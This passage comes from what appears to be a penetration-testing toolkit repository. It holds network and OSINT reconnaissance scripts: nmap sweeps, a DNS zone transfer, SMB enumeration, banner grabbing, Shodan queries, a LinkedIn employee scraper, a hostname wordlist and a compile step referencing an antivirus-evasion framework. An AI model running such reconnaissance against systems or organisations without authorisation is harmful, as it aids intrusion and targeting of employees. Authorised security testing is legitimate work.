-z "$1" ]; then 8 | read -p "Provide the path to your access.log: " access_log 9 | if [ ! -f $access_log ]; then 10 | echo "File not found!" 11 | exit 1 12 | fi 13 | else [ ! -f $1 ]; 14 | echo "File not found!"; 15 | exit 2; 16 | fi 17 | 18 | echo -e "Connections made:\n" 19 | cat $access_log |cut -d " " -f 1 |sort | uniq -c |sort -urn 20 | echo -e "\nPlease wait, this next part can take a bit...\n" 21 | echo -e "Finding files by access\n" 22 | for ip in $(cat $access_log |cut -d " " -f 1 |sort | uniq -c |sort -urn | awk '{print $2}'); do cat $access_log| grep $ip |cut -d "\"" -f 2 |uniq -c; done |sort -u 23 | 24 | # read -p "Provide what you wish to investiage further: " inv_menu; 25 | echo "Provide what you wish to investigate further: " 26 | options=("Specific Address" "Specific file accessed by specific ip address" "Exit") 27 | select inv_menu in "${options[@]}"; do 28 | case $inv_menu in 29 | "Specific Address" ) read -p "Provide the IP address: " inv_address; 30 | echo -e "Pages accessed by $inv_address by count:\n"; 31 | cat $access_log |grep "$inv_address" | cut -d "\"" -f 2 |uniq -c;; #& 32 | "Specific file accessed by specific ip address" ) if [ -z "$inv_address" ]; 33 | then 34 | echo "INFO: No IP address cached"; 35 | read -p "Provide the IP address: " inv_address; 36 | else 37 | read -p "Want to use $inv_address as the IP address? " yn 38 | case $yn in 39 | [Yy]* ) ;; 40 | [Nn]* ) read -p "Provide the IP address: " $inv_address;; 41 | * ) echo "Please answer yes or no." 
;; 42 | esac 43 | fi 44 | read -p "Provide all or part of the file name you want to see requests for: " http_file; 45 | echo -e "Unique requests for $inv_address on $http_file\n"; 46 | cat $access_log | grep "$inv_address" | cut -d "\"" -f 2 | uniq -c; 47 | echo -e "Number of response codes for $inv_address on $http_file\n"; 48 | cat $access_log | grep "$inv_address" | grep "$http_file" | sort -u | awk {'print $9'} | uniq -c; 49 | read -p "Provide response code to read from, else 'return' " inv_rescode; 50 | if [ $inv_rescode == "return" ]; then 51 | echo "INFO: Returning"; #& 52 | elif [[ $inv_rescode == "Exit" || $inv_rescode == "exit" || $inv_rescode == "Quit" || $inv_rescode == "quit*" ]]; then 53 | exit 0; 54 | else 55 | echo "$inv_rescode requests by $inv_address"; 56 | cat $access_log |grep $inv_address|grep $http_file|grep $inv_rescode; #& 57 | fi;; 58 | "Exit" ) echo "Exiting..."; 59 | exit 0;; 60 | *) echo "Select from the menu";; #& 61 | esac 62 | done 63 | -------------------------------------------------------------------------------- /auxillary/proxies/simple_http_proxy.py: -------------------------------------------------------------------------------- 1 | from twisted.web import proxy, http 2 | from twisted.internet import reactor 3 | from twisted.python import log 4 | import sys 5 | log.startLogging(sys.stdout) 6 | 7 | class ProxyFactory(http.HTTPFactory): 8 | protocol = proxy.Proxy 9 | 10 | reactor.listenTCP(8081, ProxyFactory()) 11 | reactor.run() 12 | -------------------------------------------------------------------------------- /auxillary/pyinstaller-exe-compile.sh: -------------------------------------------------------------------------------- 1 | # requires that veil-evasion is installed 2 | wine32 "C:\\Python27\python.exe" /usr/share/pyinstaller/pyinstaller.py $1 3 | -------------------------------------------------------------------------------- /enumeration/banner-grabber.py: 
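--------------------------------------------------------------------------------
#!/usr/bin/python
# Simple fuzz against a target
# (connects to host:port, prints whatever the service sends first, then exits)
import socket
from sys import exit,argv

if len(argv) < 3:
    print "Grabs the banner of a remote TCP service"
    print "Usage: %s <host> <port>" % str(argv[0])
    exit(1)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bug fix: the timeout was set after connect(), so a silent host could hang
# the connect forever; setting it first bounds both connect() and recv().
s.settimeout(5.0)
try:
    s.connect((str(argv[1]),int(argv[2])))
    print(s.recv(1024)) # Grab the banner, do not remove
finally:
    s.close()
exit(0)
--------------------------------------------------------------------------------
/enumeration/dns/zone-transfer.sh:
--------------------------------------------------------------------------------
if [ -z "$1" ]; then
    echo "[*] DNS Zonetransfer script"
    echo "USAGE : $0 megacorpone.com"
    exit 1
fi

# Ask every authoritative server for a zone transfer; keep only A records.
for server in $(host -t ns "$1" | cut -d " " -f4); do
    host -l "$1" "$server" | grep "has address"
done
--------------------------------------------------------------------------------
/enumeration/fully-detailed-nmap-scan.sh:
--------------------------------------------------------------------------------
#!/bin/bash
if [ -z "$1" ]; then
    echo "[*] Nmap script to ping a subnet, then fully scan it"
    echo "[*] Dumps the output in XML in hosts/nmap.xml"
    echo "[*] Usage : $0 <subnet> [comma-separated list of DNS server(s)]"
    # Bug fix: without this exit the script carried on and ran nmap against
    # an empty target right after printing the usage.
    exit 1
fi

if [ ! -d "hosts" ]; then
    mkdir hosts;
fi

nmap -sn "$1" | grep report | cut -d " " -f 5 | tee ping_sweep

for host in $(cat ping_sweep); do
    if [ ! \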
-d "hosts/$host" ]; then 16 | mkdir hosts/$host; 17 | fi 18 | done 19 | 20 | if [ -z "$2" ]; then 21 | nmap -sS -R -A -iL ping_sweep -T5 -e tap0 -oX hosts/nmap.xml -v; 22 | else 23 | nmap -sS -R --dns-servers $2 -A -iL ping_sweep -T5 -e tap0 -oX hosts/nmap.xml -v; 24 | 25 | fi 26 | -------------------------------------------------------------------------------- /enumeration/osint/org2linkedin/README.md: -------------------------------------------------------------------------------- 1 | # Installation 2 | See [this page](https://developers.google.com/api-client-library/python/start/installation#system-requirements) for instructions on how to install the Google client library 3 | 4 | # Google Search Requirements 5 | You need to create a Google Developer API Key. Register [here](https://console.developers.google.com/) and create a new project. 6 | 7 | You'll also need to create a Google Custom Search Engine. Register [here](https://cse.google.com/cse/all). 8 | 9 | # Bing Search Requirements 10 | You need to create a Bing Search API key. Register [here](https://datamarket.azure.com/dataset/bing/search). 11 | 12 | # Configuration 13 | Copy [config.exmpl.cfg](config.exmpl.cfg) to ```config.cfg```: 14 | 15 | ``` 16 | cp config.{exmpl,}.cfg 17 | ``` 18 | 19 | Insert your Google Developer API key into ```config.cfg```, replacing `````` with it. 20 | Next, insert your Google Custom Search Engine key into ```config.cfg```, replacing `````` with it. 21 | 22 | Finally, insert your Bing Primary Account Key into ```config.cfg```, replacing `````` with it. 
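
# Usage

```
usage: ./org2linkedin.py [options]

Google Linkedin Scraper to enumerate current employees at a given organization
with publicly available Linkedin profiles

optional arguments:
  -h, --help            show this help message and exit
  -n NORESULTS          Number of results from Google
  -o ORGNAME            Name of organization to search for
  --dev-key DEVELOPER_KEY
                        Your Google Developer Key
  --cx-key CX_KEY       Your Google Custom Search Engine key
  -v, --verbose         Verbose output
  -d, --debug           Debugging output (implies -v)
```

# Issues
Should any issues arise with this, please run the script with the ```-d``` flag, and provide any output in the comments of a new issue you open through Github.
--------------------------------------------------------------------------------
/enumeration/osint/org2linkedin/config.exmpl.cfg:
--------------------------------------------------------------------------------
[GOOGLE_API_KEYS]
G_DEVELOPER_KEY=
G_CX_KEY=
[BING_API_KEYS]
B_API_KEY=
--------------------------------------------------------------------------------
/enumeration/osint/org2linkedin/org2linkedin.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
import argparse
from sys import argv, stdout
from googleapiclient.discovery import build
import re
import ConfigParser
from py_bing_search import PyBingWebSearch

# Setup for argument parsing
parser = argparse.ArgumentParser(prog=str(argv[0]), usage='%(prog)s [options]', description='Google Linkedin Scraper to enumerate current employees at a given organization with publicly available Linkedin profiles')

# type=int: the value is compared with an integer counter in searchGoogle();
# without it a '-n' given on the command line arrived as a str, which in
# Python 2 always compares greater than an int, so the loop was never bounded.
parser.add_argument('-n', type=int, help='Number of results from Google', dest='noresults', default=50)
parser.add_argument('-o', help='Name of organization to search for', dest='orgname')
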
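parser.add_argument('--g-dev-key', help='Your Google Developer Key', dest='G_DEVELOPER_KEY', required=False)
parser.add_argument('--g-cx-key', help='Your Google Custom Search Engine key', dest='G_CX_KEY', required=False)
parser.add_argument('--b-api-key', help='Your Bing Web Search api key', dest='B_API_KEY', required=False)
parser.add_argument('-v', "--verbose", help="Verbose output", action="store_true", dest='verbose')
parser.add_argument('-d', "--debug", help="Debugging output (implies -v)", action="store_true", dest='debug')

# parse arguments
args = parser.parse_args()
argsdict = vars(args)
noresults = argsdict['noresults']
orgname = argsdict['orgname']
G_DEVELOPER_KEY = argsdict['G_DEVELOPER_KEY']
G_CX_KEY = argsdict['G_CX_KEY']
verbose = argsdict['verbose']
debug = argsdict['debug']
B_API_KEY = argsdict['B_API_KEY']

if debug:
    verbose = True

# if no orgname provided, grab here
if orgname == None:
    orgname = raw_input('Organization name: ')
query = 'site:linkedin.com inurl:pub -inurl:dir "at " ' + '"' + str(orgname) + '"' + ' \'Current\''

# parse config file
config = ConfigParser.ConfigParser()
config.read('config.cfg')


def _load_key(current, section, option, prompt, warn):
    """Resolve one API key: command line first, then config.cfg, then a prompt.

    `current` is the command-line value (None when the flag was not given).
    An option that is missing from config.cfg, or present with an empty value
    as in config.exmpl.cfg, counts as not configured and falls through to
    raw_input. Returns the key string.

    Bug fix: the original always overwrote the command-line value with the
    config value, and tested it against None although ConfigParser returns
    '' for an empty option, so an unfilled config.cfg silently "configured"
    empty keys.
    """
    if current:
        return current
    try:
        value = config.get(section, option)
    except (ConfigParser.NoOptionError, ConfigParser.NoSectionError):
        value = None
    if not value:
        if verbose:
            print "WARN: %s" % warn
        value = raw_input(prompt)
    return value


# parse api keys
G_DEVELOPER_KEY = _load_key(G_DEVELOPER_KEY, 'GOOGLE_API_KEYS', 'G_DEVELOPER_KEY',
                            'Enter your Google Developer Key (developerKey): ',
                            'G_DEVELOPER_KEY not found in config.cfg')
if debug:
    # Report that a key was loaded without echoing the secret into scrollback.
    print "DEBUG: Google Dev key loaded (%d chars)" % len(G_DEVELOPER_KEY)

G_CX_KEY = _load_key(G_CX_KEY, 'GOOGLE_API_KEYS', 'G_CX_KEY',
                     'Enter your Google CSE key (G_CX_KEY): ',
                     'G_CX_KEY not found in config.cfg')
if debug:
    print "DEBUG: Google CSE key loaded (%d chars)" % len(G_CX_KEY)

B_API_KEY = _load_key(B_API_KEY, 'BING_API_KEYS', 'B_API_KEY',
                      'Enter your Bing Web Search API Key: ',
                      'B_API_KEY not found in config.cfg')
if debug:
    print "DEBUG: Bing API key loaded (%d chars)" % len(B_API_KEY)

# Bug fix: 'if G_CX_KEY or G_DEVELOPER_KEY == None' parsed as
# (G_CX_KEY) or (G_DEVELOPER_KEY == None), which disabled Google precisely
# when a CSE key *was* present. Google needs both keys; Bing needs its one.
GOOGLE_FLAG = bool(G_DEVELOPER_KEY and G_CX_KEY)
BING_FLAG = bool(B_API_KEY)


def main():
    """Run whichever searches have credentials available."""
    if GOOGLE_FLAG:
        searchGoogle()
    if BING_FLAG:
        searchBing()


def _print_google_item(item, org):
    """Print name and role for one CSE result whose hcard title names `org`.

    `org` is the lower-cased organisation name. Results without an hcard
    (KeyError) fall back to inspecting the snippet, which only produces
    verbose/debug output as in the original.
    """
    try:
        for hcard in item['pagemap']['hcard']:
            if org not in str(hcard['title']).lower():
                if debug:
                    print "DEBUG: str(orgname) = ", org, " str(hcard['title'])", str(hcard['title']).lower()
                if verbose:
                    print "INFO: orgname not found in hcard['title']"
                break
            else:
                stdout.write('Name: ')
                stdout.write(re.sub(' \| LinkedIn', ',', str(item['title'])))
                stdout.write(' Role: ')
                stdout.write(str(hcard['title']))
                stdout.write("\n")
    except KeyError:
        if debug:
            print "DEBUG: Caught KeyError exception"
            print item
        try:
            if org not in str(item['pagemap']['snippet']).lower():
                if verbose:
                    print "INFO: orgname not found in hcard['title'], trying item['pagemap']['snippet']"
                if debug:
                    print "DEBUG: str(orgname): ", org, " != str(item['pagemap']['snippet']): ", str(item['pagemap']['snippet']).lower()
        except Exception as e:
            print "ERROR: Something weird happened, printing exception: "
            print e


def searchGoogle():
    """Page through Google CSE results for `query`, printing name and role.

    Pages hold 10 items; paging stops at `noresults`, when the API returns
    no more items, or on HttpError (typically an exhausted quota).
    """
    # Function-scope import: HttpError was caught below but never imported,
    # so the handler itself raised NameError the first time it was needed.
    from googleapiclient.errors import HttpError
    service = build("customsearch", "v1", developerKey=G_DEVELOPER_KEY)
    org = str(orgname).lower()
    limit = int(noresults)  # tolerate a str if '-n' was parsed without type=int
    counter = 1
    while (counter < limit):
        if debug:
            print "DEBUG: Is counter < noresults?: ", (counter < limit), " Counter: ", counter, " NoResults: ", limit
        try:
            res = service.cse().list(
                q=query,
                cx=G_CX_KEY,
                lr="lang_en",
                start=counter,
                num=10,
            ).execute()
        except HttpError as e:
            print "ERROR: Caught HTTPError, you may be out of queries, see output for more info: "
            print e
            break
        counter += 10
        # Bug fix: the API omits 'items' entirely once results run out, which
        # used to raise KeyError; stop paging instead.
        items = res.get('items')
        if not items:
            break
        for item in items:
            try:
                _print_google_item(item, org)
            except UnicodeEncodeError:
                if debug:
                    print "DEBUG: Caught UnicodeEncodeError exception"
                    print "DEBUG: Printing item for debugging: "
                    print item
            except Exception as e:
                print "Google_ERROR: Something strange happened, printing error: "
                print e
                exit()


def searchBing():
    """Query Bing for LinkedIn profiles mentioning `orgname`; print name/role.

    Bing is asked for 50 results. Each description is matched first for
    ". <role> at <org>" (role captured) and then for the looser
    "... at <org>." form (whole match printed).
    """
    search_term = "site:linkedin.com instreamset:(url):\"/pub/\" -instreamset:(url):\"/dir/\" && (\"at %s\" || \"at %s\")" % (orgname,orgname.lower())
    bing_web = PyBingWebSearch(B_API_KEY, search_term)
    result = bing_web.search(limit=50, format='json')

    # Bug fix: the patterns were built from orgname but the actual searches
    # used a hard-coded company name, so any other organisation matched
    # nothing. re.escape keeps metacharacters in the name (e.g. '.') literal.
    org_pattern = re.escape(orgname)
    first_regex = re.compile(r'\.\s([\w\s]*\sat\s%s)' % org_pattern, re.IGNORECASE)
    second_regex = re.compile(r'^.*at\s%s\.' % org_pattern, re.IGNORECASE)

    counter = 0
    while counter < 50:
        try:
            if debug:
                print "DEBUG: Bing[", counter,"] first regex_string is: ", first_regex.pattern
            m = first_regex.search(result[counter].description)
            if debug:
                print "DEBUG: Bing[", counter,"] raw results:"
                print "title: ", result[counter].title, " description: ", result[counter].description
            if m is None:
                if debug:
                    print "DEBUG: Bing[", counter,"] first regex returned 'None'"
                    print "DEBUG: Bing[", counter,"] second regex_string is: ", second_regex.pattern
                m = second_regex.search(result[counter].description)
                if m is None:
                    if debug:
                        print "DEBUG: Bing[", counter,"] second regex returned 'None'"
                    counter+=1
                    continue
            if debug:
                print "DEBUG: Bing [", counter, "] full regex match: ", str(m.group())
            stdout.write('Name: ')
            stdout.write(str(re.sub(' \| LinkedIn', ',', result[counter].title)))
            stdout.write(' Role: ')
            try:
                stdout.write(str(m.group(1)))
            except IndexError:
                # the second pattern has no capture group: print the whole match
                stdout.write(str(m.group()))
            if verbose:
                stdout.write(' VERBOSE_URL: ')
                stdout.write(result[counter].url)
            stdout.write("\n")
            counter+=1
        except IndexError:
            if verbose:
                print "INFO: No additional Bing Search Results available"
            break
        except Exception as e:
            print "Bing_ERROR: Something strange happened, printing error: "
            print e
            exit()

if __name__ == '__main__':
    main()

--------------------------------------------------------------------------------
/enumeration/shodan/shodan_dns_resolve.sh:
--------------------------------------------------------------------------------
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
SHODAN_API_KEY=$(cat "$DIR/SHODAN_API_KEY")
# The Shodan API takes the key as a query parameter, so it is part of the curl
# command line and visible to other local users via the process list.
# -G/--data-urlencode sends the argument as a properly encoded query parameter
# instead of splicing it raw into the URL.
curl --silent -G -H 'Accept: application/json' "https://api.shodan.io/dns/resolve?key=$SHODAN_API_KEY" --data-urlencode "hostnames=$1" | python -mjson.tool
printf '\n'
--------------------------------------------------------------------------------
/enumeration/shodan/shodan_dns_reverse.sh:
--------------------------------------------------------------------------------
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
SHODAN_API_KEY=$(cat "$DIR/SHODAN_API_KEY")
curl --silent -G -H 'Accept: application/json' "https://api.shodan.io/dns/reverse?key=$SHODAN_API_KEY" --data-urlencode "ips=$1" | python -mjson.tool
printf '\n'
--------------------------------------------------------------------------------
/enumeration/shodan/shodan_ip_info.sh:
--------------------------------------------------------------------------------
DIR="$( cd "$( dirname \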
"${BASH_SOURCE[0]}" )" && pwd )" 2 | SHODAN_API_KEY=$(cat $DIR/SHODAN_API_KEY) 3 | curl --silent -H "Accept: application/json" "https://api.shodan.io/shodan/host/$1?key=$SHODAN_API_KEY" | python -mjson.tool 4 | printf '\n' 5 | -------------------------------------------------------------------------------- /enumeration/shodan/shodan_ip_scan.sh: -------------------------------------------------------------------------------- 1 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" 2 | SHODAN_API_KEY=$(cat $DIR/SHODAN_API_KEY) 3 | curl --silent -H 'Accept: application/json' "https://api.shodan.io/shodan/scan?key=$SHODAN_API_KEY" -d "ips=$1" | python -mjson.tool 4 | printf '\n' 5 | -------------------------------------------------------------------------------- /enumeration/shodan/shodan_labs_honeyscore.sh: -------------------------------------------------------------------------------- 1 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" 2 | SHODAN_API_KEY=$(cat $DIR/SHODAN_API_KEY) 3 | curl --silent -H "Accept: application/json" "https://api.shodan.io/labs/honeyscore/$1?key=$SHODAN_API_KEY" | python -mjson.tool 4 | printf '\n' 5 | -------------------------------------------------------------------------------- /enumeration/shodan/shodan_sysinfo_account_profile.sh: -------------------------------------------------------------------------------- 1 | if [ $# -eq 0 ] 2 | then 3 | echo "USAGE: $0 " 4 | exit 1 5 | fi 6 | curl --silent -H 'Accept: application/json' "https://api.shodan.io/account/profile?key=$1" | python -mjson.tool 7 | printf '\n 8 | 9 | -------------------------------------------------------------------------------- /enumeration/shodan/shodan_sysinfo_api-info.sh: -------------------------------------------------------------------------------- 1 | if [ $# -eq 0 ] 2 | then 3 | echo "USAGE: $0 " 4 | exit 1 5 | fi 6 | curl --silent -H 'Accept: application/json' "https://api.shodan.io/api-info?key=$1" 7 | printf '\n' 8 | 
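--------------------------------------------------------------------------------
/enumeration/shodan/shodan_sysinfo_profile-info.sh:
--------------------------------------------------------------------------------
# Same request as shodan_sysinfo_account_profile.sh; the key is taken from the
# command line here, so it is visible in shell history and the process list.
if [ $# -eq 0 ]
then
    echo "USAGE: $0 <api_key>"
    exit 1
fi
curl --silent -H 'Accept: application/json' "https://api.shodan.io/account/profile?key=$1" | python -mjson.tool
printf '\n'
--------------------------------------------------------------------------------
/enumeration/shodan/shodan_sysinfo_scanstatus.sh:
--------------------------------------------------------------------------------
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
SHODAN_API_KEY=$(cat "$DIR/SHODAN_API_KEY")
# $1 is the scan id returned by shodan_ip_scan.sh.
curl --silent -X GET -H 'Accept: application/json' "https://api.shodan.io/shodan/scan/$1?key=$SHODAN_API_KEY&id=$1" | python -mjson.tool
printf '\n'
--------------------------------------------------------------------------------
/enumeration/shodan/shodan_sysinfo_tools-myip.sh:
--------------------------------------------------------------------------------
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
SHODAN_API_KEY=$(cat "$DIR/SHODAN_API_KEY")
curl --silent -H 'Accept: application/json' "https://api.shodan.io/tools/myip?key=$SHODAN_API_KEY" | python -mjson.tool
printf '\n'
--------------------------------------------------------------------------------
/enumeration/shodan/shodan_sysinfo_what-ports.sh:
--------------------------------------------------------------------------------
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
SHODAN_API_KEY=$(cat "$DIR/SHODAN_API_KEY")
curl --silent -H 'Accept: application/json' "https://api.shodan.io/shodan/ports?key=$SHODAN_API_KEY" | python -mjson.tool
printf '\n'
--------------------------------------------------------------------------------
/enumeration/shodan/shodan_sysinfo_what-protocols.sh: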
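--------------------------------------------------------------------------------
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
SHODAN_API_KEY=$(cat "$DIR/SHODAN_API_KEY")
curl --silent -H 'Accept: application/json' "https://api.shodan.io/shodan/protocols?key=$SHODAN_API_KEY" | python -mjson.tool
printf '\n'
--------------------------------------------------------------------------------
/enumeration/shodan/shodan_sysinfo_what-services.sh:
--------------------------------------------------------------------------------
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
SHODAN_API_KEY=$(cat "$DIR/SHODAN_API_KEY")
curl --silent -H 'Accept: application/json' "https://api.shodan.io/shodan/services?key=$SHODAN_API_KEY" | python -mjson.tool
printf '\n'
--------------------------------------------------------------------------------
/enumeration/smb/smb_enum.sh:
--------------------------------------------------------------------------------
#!/bin/bash
if [ -z "$1" ]; then
    echo "[*] Automagically enumerate SMB hosts and SMB info from a given network range"
    echo "[*] Dumps the output to hosts/<host>/enum4linux_smb_info"
    echo "[*] Usage : $0 <network range>"
    exit 1
fi

# Bug fix: tee cannot create directories, so hosts/ and hosts/<host>/ must
# exist before writing; they only did if fully-detailed-nmap-scan.sh had
# been run first.
mkdir -p hosts
nbtscan "$1" | tee hosts/nbtscan_info

for host in $(nmap -p 139,445 "$1" --open | grep report | cut -d " " -f5); do
    mkdir -p "hosts/$host"
    enum4linux -v "$host" | tee "hosts/$host/enum4linux_smb_info";
done

exit 0
--------------------------------------------------------------------------------
/enumeration/smtp/namelist:
--------------------------------------------------------------------------------
0
01
02
03
1
10
11
12
13
14
15
16
17
18
19
2
20
3
3com
4
5
6
7
8
9
ILMI
a
a.auth-ns
a01
a02
a1
a2
abc
about
ac
academico
acceso
access
accounting
accounts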
acid 42 | activestat 43 | ad 44 | adam 45 | adkit 46 | admin 47 | administracion 48 | administrador 49 | administrator 50 | administrators 51 | admins 52 | ads 53 | adserver 54 | adsl 55 | ae 56 | af 57 | affiliate 58 | affiliates 59 | afiliados 60 | ag 61 | agenda 62 | agent 63 | ai 64 | aix 65 | ajax 66 | ak 67 | akamai 68 | al 69 | alabama 70 | alaska 71 | albuquerque 72 | alerts 73 | alpha 74 | alterwind 75 | am 76 | amarillo 77 | americas 78 | an 79 | anaheim 80 | analyzer 81 | announce 82 | announcements 83 | antivirus 84 | ao 85 | ap 86 | apache 87 | apollo 88 | app 89 | app01 90 | app1 91 | apple 92 | application 93 | applications 94 | apps 95 | appserver 96 | aq 97 | ar 98 | archie 99 | arcsight 100 | argentina 101 | arizona 102 | arkansas 103 | arlington 104 | as 105 | as400 106 | asia 107 | asterix 108 | at 109 | athena 110 | atlanta 111 | atlas 112 | att 113 | au 114 | auction 115 | austin 116 | auth 117 | auto 118 | autodiscover 119 | autorun 120 | av 121 | aw 122 | ayuda 123 | az 124 | b 125 | b.auth-ns 126 | b01 127 | b02 128 | b1 129 | b2 130 | b2b 131 | b2c 132 | ba 133 | back 134 | backend 135 | backup 136 | baker 137 | bakersfield 138 | balance 139 | balancer 140 | baltimore 141 | banking 142 | bayarea 143 | bb 144 | bbdd 145 | bbs 146 | bd 147 | bdc 148 | be 149 | bea 150 | beta 151 | bf 152 | bg 153 | bh 154 | bi 155 | billing 156 | biz 157 | biztalk 158 | bj 159 | black 160 | blackberry 161 | blog 162 | blogs 163 | blue 164 | bm 165 | bn 166 | bnc 167 | bo 168 | bob 169 | bof 170 | boise 171 | bolsa 172 | border 173 | boston 174 | boulder 175 | boy 176 | br 177 | bravo 178 | brazil 179 | britian 180 | broadcast 181 | broker 182 | bronze 183 | brown 184 | bs 185 | bsd 186 | bsd0 187 | bsd01 188 | bsd02 189 | bsd1 190 | bsd2 191 | bt 192 | bug 193 | buggalo 194 | bugs 195 | bugzilla 196 | build 197 | bulletins 198 | burn 199 | burner 200 | buscador 201 | buy 202 | bv 203 | bw 204 | by 205 | bz 206 | c 207 | c.auth-ns 208 | ca 209 | cache 210 | 
cafe 211 | calendar 212 | california 213 | call 214 | calvin 215 | canada 216 | canal 217 | canon 218 | careers 219 | catalog 220 | cc 221 | cd 222 | cdburner 223 | cdn 224 | cert 225 | certificates 226 | certify 227 | certserv 228 | certsrv 229 | cf 230 | cg 231 | cgi 232 | ch 233 | channel 234 | channels 235 | charlie 236 | charlotte 237 | chat 238 | chats 239 | chatserver 240 | check 241 | checkpoint 242 | chi 243 | chicago 244 | ci 245 | cims 246 | cincinnati 247 | cisco 248 | citrix 249 | ck 250 | cl 251 | class 252 | classes 253 | classifieds 254 | classroom 255 | cleveland 256 | clicktrack 257 | client 258 | clientes 259 | clients 260 | club 261 | clubs 262 | cluster 263 | clusters 264 | cm 265 | cmail 266 | cms 267 | cn 268 | co 269 | cocoa 270 | code 271 | coldfusion 272 | colombus 273 | colorado 274 | columbus 275 | com 276 | commerce 277 | commerceserver 278 | communigate 279 | community 280 | compaq 281 | compras 282 | con 283 | concentrator 284 | conf 285 | conference 286 | conferencing 287 | confidential 288 | connect 289 | connecticut 290 | consola 291 | console 292 | consult 293 | consultant 294 | consultants 295 | consulting 296 | consumer 297 | contact 298 | content 299 | contracts 300 | core 301 | core0 302 | core01 303 | corp 304 | corpmail 305 | corporate 306 | correo 307 | correoweb 308 | cortafuegos 309 | counterstrike 310 | courses 311 | cr 312 | cricket 313 | crm 314 | crs 315 | cs 316 | cso 317 | css 318 | ct 319 | cu 320 | cust1 321 | cust10 322 | cust100 323 | cust101 324 | cust102 325 | cust103 326 | cust104 327 | cust105 328 | cust106 329 | cust107 330 | cust108 331 | cust109 332 | cust11 333 | cust110 334 | cust111 335 | cust112 336 | cust113 337 | cust114 338 | cust115 339 | cust116 340 | cust117 341 | cust118 342 | cust119 343 | cust12 344 | cust120 345 | cust121 346 | cust122 347 | cust123 348 | cust124 349 | cust125 350 | cust126 351 | cust13 352 | cust14 353 | cust15 354 | cust16 355 | cust17 356 | cust18 357 | cust19 358 | cust2 
359 | cust20 360 | cust21 361 | cust22 362 | cust23 363 | cust24 364 | cust25 365 | cust26 366 | cust27 367 | cust28 368 | cust29 369 | cust3 370 | cust30 371 | cust31 372 | cust32 373 | cust33 374 | cust34 375 | cust35 376 | cust36 377 | cust37 378 | cust38 379 | cust39 380 | cust4 381 | cust40 382 | cust41 383 | cust42 384 | cust43 385 | cust44 386 | cust45 387 | cust46 388 | cust47 389 | cust48 390 | cust49 391 | cust5 392 | cust50 393 | cust51 394 | cust52 395 | cust53 396 | cust54 397 | cust55 398 | cust56 399 | cust57 400 | cust58 401 | cust59 402 | cust6 403 | cust60 404 | cust61 405 | cust62 406 | cust63 407 | cust64 408 | cust65 409 | cust66 410 | cust67 411 | cust68 412 | cust69 413 | cust7 414 | cust70 415 | cust71 416 | cust72 417 | cust73 418 | cust74 419 | cust75 420 | cust76 421 | cust77 422 | cust78 423 | cust79 424 | cust8 425 | cust80 426 | cust81 427 | cust82 428 | cust83 429 | cust84 430 | cust85 431 | cust86 432 | cust87 433 | cust88 434 | cust89 435 | cust9 436 | cust90 437 | cust91 438 | cust92 439 | cust93 440 | cust94 441 | cust95 442 | cust96 443 | cust97 444 | cust98 445 | cust99 446 | customer 447 | customers 448 | cv 449 | cvs 450 | cx 451 | cy 452 | cz 453 | d 454 | dallas 455 | data 456 | database 457 | database01 458 | database02 459 | database1 460 | database2 461 | databases 462 | datastore 463 | datos 464 | david 465 | db 466 | db0 467 | db01 468 | db02 469 | db1 470 | db2 471 | dc 472 | de 473 | dealers 474 | dec 475 | def 476 | default 477 | defiant 478 | delaware 479 | dell 480 | delta 481 | delta1 482 | demo 483 | demonstration 484 | demos 485 | denver 486 | depot 487 | des 488 | desarrollo 489 | descargas 490 | design 491 | designer 492 | desktop 493 | detroit 494 | dev 495 | dev0 496 | dev01 497 | dev1 498 | devel 499 | develop 500 | developer 501 | developers 502 | development 503 | device 504 | devserver 505 | devsql 506 | dhcp 507 | dial 508 | dialup 509 | digital 510 | dilbert 511 | dir 512 | direct 513 | directory 514 | 
disc 515 | discovery 516 | discuss 517 | discussion 518 | discussions 519 | disk 520 | disney 521 | distributer 522 | distributers 523 | dj 524 | dk 525 | dm 526 | dmail 527 | dmz 528 | dnews 529 | dns 530 | dns-2 531 | dns0 532 | dns1 533 | dns2 534 | dns3 535 | do 536 | docs 537 | documentacion 538 | documentos 539 | domain 540 | domains 541 | dominio 542 | domino 543 | dominoweb 544 | doom 545 | download 546 | downloads 547 | downtown 548 | dragon 549 | drupal 550 | dsl 551 | dyn 552 | dynamic 553 | dynip 554 | dz 555 | e 556 | e-com 557 | e-commerce 558 | e0 559 | eagle 560 | earth 561 | east 562 | ec 563 | echo 564 | ecom 565 | ecommerce 566 | edi 567 | edu 568 | education 569 | edward 570 | ee 571 | eg 572 | eh 573 | ejemplo 574 | elpaso 575 | email 576 | employees 577 | empresa 578 | empresas 579 | en 580 | enable 581 | eng 582 | eng01 583 | eng1 584 | engine 585 | engineer 586 | engineering 587 | enterprise 588 | epsilon 589 | er 590 | erp 591 | es 592 | esd 593 | esm 594 | espanol 595 | estadisticas 596 | esx 597 | et 598 | eta 599 | europe 600 | events 601 | example 602 | exchange 603 | exec 604 | extern 605 | external 606 | extranet 607 | f 608 | f5 609 | falcon 610 | farm 611 | faststats 612 | fax 613 | feedback 614 | feeds 615 | fi 616 | field 617 | file 618 | files 619 | fileserv 620 | fileserver 621 | filestore 622 | filter 623 | find 624 | finger 625 | firewall 626 | fix 627 | fixes 628 | fj 629 | fk 630 | fl 631 | flash 632 | florida 633 | flow 634 | fm 635 | fo 636 | foobar 637 | formacion 638 | foro 639 | foros 640 | fortworth 641 | forum 642 | forums 643 | foto 644 | fotos 645 | foundry 646 | fox 647 | foxtrot 648 | fr 649 | france 650 | frank 651 | fred 652 | freebsd 653 | freebsd0 654 | freebsd01 655 | freebsd02 656 | freebsd1 657 | freebsd2 658 | freeware 659 | fresno 660 | front 661 | frontdesk 662 | fs 663 | fsp 664 | ftp 665 | ftp- 666 | ftp0 667 | ftp2 668 | ftpserver 669 | fw 670 | fw-1 671 | fw1 672 | fwsm 673 | fwsm0 674 | fwsm01 675 | 
